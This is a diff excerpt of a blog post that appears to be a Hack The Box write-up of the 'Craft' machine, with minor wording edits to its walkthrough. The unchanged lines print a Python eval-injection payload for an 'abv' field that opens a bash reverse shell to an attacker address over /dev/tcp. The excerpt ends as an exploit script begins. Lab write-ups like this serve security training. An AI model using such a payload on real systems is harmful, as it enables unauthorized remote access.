padraignix/padraignix.github.io/_posts/2020-1-07-htb-machine-craft.md

 <img src="{{ '/assets/htb-craft/brew-gogs-abv-issue.PNG' | relative_url }}">
 </p>

-<p>Based on these finds and with the previous <code>/auth/login</code> api endpoint we looked we're starting to shape up.
-We should initially be able to login and generate a valid token as <code>dinesh</code>.
-Combine this with an unsanitized <code>eval()</code> in the <code>/brew</code> endpoint we should be able to be able to pass a payload through a <code>POST</code> request.
+<p>Based on these finds and with the previous <code>/auth/login</code> api endpoint we looked at we're starting to shape up.
+We should initially be able to login and generate a valid token as <code>dinesh</code> using his credentials.
+Combine this with an unsanitized <code>eval()</code> in the <code>/brew</code> endpoint and we should be able to be able to pass a payload through a <code>POST</code> request.
 A few different payloads were tested however the following payload ended up working</p>

 {% highlight shell %}
 "abv":"__import__('os').system('bash -i >& /dev/tcp/10.10.xx.xx/1337 0>&1")"
 {% endhighlight %}

-<p>Combining all the parts together we write a small script to put it all together.</p>
+<p>Combining all the parts we write a small script to put it all together.</p>

 {% highlight python %}
 root@kali:~/Desktop/HTB/Craft# cat test.py